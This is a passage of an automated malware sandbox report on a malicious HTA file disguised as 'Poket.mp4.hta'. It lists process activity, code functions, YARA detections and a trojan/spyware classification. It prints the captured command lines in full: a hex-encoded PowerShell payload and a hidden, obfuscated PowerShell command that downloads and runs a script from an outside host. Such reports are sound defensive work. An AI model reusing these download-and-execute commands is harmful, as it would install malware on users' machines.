              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038510210_2_00385102
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038F95010_2_0038F950
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038C95010_2_0038C950
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038E15010_2_0038E150
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037394010_2_00373940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037598010_2_00375980
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003791F010_2_003791F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003979D010_2_003979D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A91D010_2_003A91D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AF9D010_2_003AF9D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037627010_2_00376270
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039027010_2_00390270
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037F25010_2_0037F250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AF25010_2_003AF250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00395A4010_2_00395A40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038DAA810_2_0038DAA8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003742F010_2_003742F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B02E010_2_003B02E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037CAD010_2_0037CAD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A72C910_2_003A72C9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038832810_2_00388328
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039F30110_2_0039F301
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00398B7010_2_00398B70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AC36010_2_003AC360
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038739F10_2_0038739F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AF43010_2_003AF430
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00388C2810_2_00388C28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039442810_2_00394428
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038B47010_2_0038B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A1C7010_2_003A1C70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AEC5E10_2_003AEC5E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037DC4E10_2_0037DC4E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037C44A10_2_0037C44A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003984B010_2_003984B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00387CF110_2_00387CF1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003774E010_2_003774E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AD4CF10_2_003AD4CF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003914C010_2_003914C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00399CC010_2_00399CC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AF4C010_2_003AF4C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A7CC010_2_003A7CC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038E52410_2_0038E524
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A950010_2_003A9500
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038FD7010_2_0038FD70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00393D7010_2_00393D70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AF55010_2_003AF550
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038654810_2_00386548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AFD9010_2_003AFD90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00395DC010_2_00395DC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039863310_2_00398633
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A9E2710_2_003A9E27
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00386E1010_2_00386E10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037960010_2_00379600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039667A10_2_0039667A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A666A10_2_003A666A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038F65010_2_0038F650
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038565610_2_00385656
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038D6F410_2_0038D6F4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00381EED10_2_00381EED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039AEE010_2_0039AEE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003876E310_2_003876E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B06C010_2_003B06C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A7F2010_2_003A7F20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039DF1110_2_0039DF11
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037670010_2_00376700
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AC77010_2_003AC770
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00372F4010_2_00372F40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038832810_2_00388328
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00395FA610_2_00395FA6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003927F010_2_003927F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038988F10_2_0038988F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038AFD710_2_0038AFD7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00378020 appears 50 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 003850E0 appears 44 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 5045
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 5045Jump to behavior
              Source: Process Memory Space: powershell.exe PID: 4108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@9/6@3/2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A8810 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,10_2_003A8810
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtvknccl.cy2.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Poket.mp4.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3DJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
